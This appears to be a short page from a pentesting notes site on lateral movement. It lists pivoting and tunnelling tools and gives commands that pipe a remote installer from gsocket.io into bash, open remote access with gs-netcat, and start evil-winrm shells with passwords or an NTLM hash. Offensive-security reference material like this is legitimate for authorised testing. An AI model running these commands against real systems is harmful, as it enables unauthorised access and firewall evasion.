Lateral Movement

​Neo-reGeorg: The successor to reDuh, pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.
​Tunna:  Tunna is a set of tools which will wrap and tunnel any TCP communication over HTTP. It can be used to bypass network restrictions in fully firewalled environments.
​pivotnacci:  Pivot into the internal network by deploying HTTP agents. Pivotnacci allows you to create a socks server that communicates with HTTP agents. The architecture looks like the following:
​ngrok: Spend more time programming. One command for an instant, secure URL to your localhost server through any NAT or firewall.
​gsocket:  The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.
Use either one of these two commands to deploy:
bash -c "$(curl -fsSL gsocket.io/x)"
bash -c "$(wget -qO- gsocket.io/x)"
Use either one of these two commands to uninstall:
GS_UNDO=1 bash -c "$(curl -fsSL gsocket.io/x)"
GS_UNDO=1 bash -c "$(wget -qO- gsocket.io/x)"
Access the remote host from anywhere in the world:
$ gs-netcat -s ExampleSecretChagneMe -i
Global Socket
Connect like there is no firewall. Securely.
www.gsocket.io
​evil-winrm: This shell is the ultimate WinRM shell for hacking/pentesting.
ruby evil-winrm.rb -i 10.10.10.161 -u username -p passw0rd
ruby evil-winrm.rb -i 10.0.0.20 -u user -H BD1C6503987F8FF006296118F359FA79
ruby evil-winrm.rb -i 10.10.10.149 -u 'DOMAIN\USER' -p 'passw0rd
(De)serialization
Powershell
Last updated 3 months ago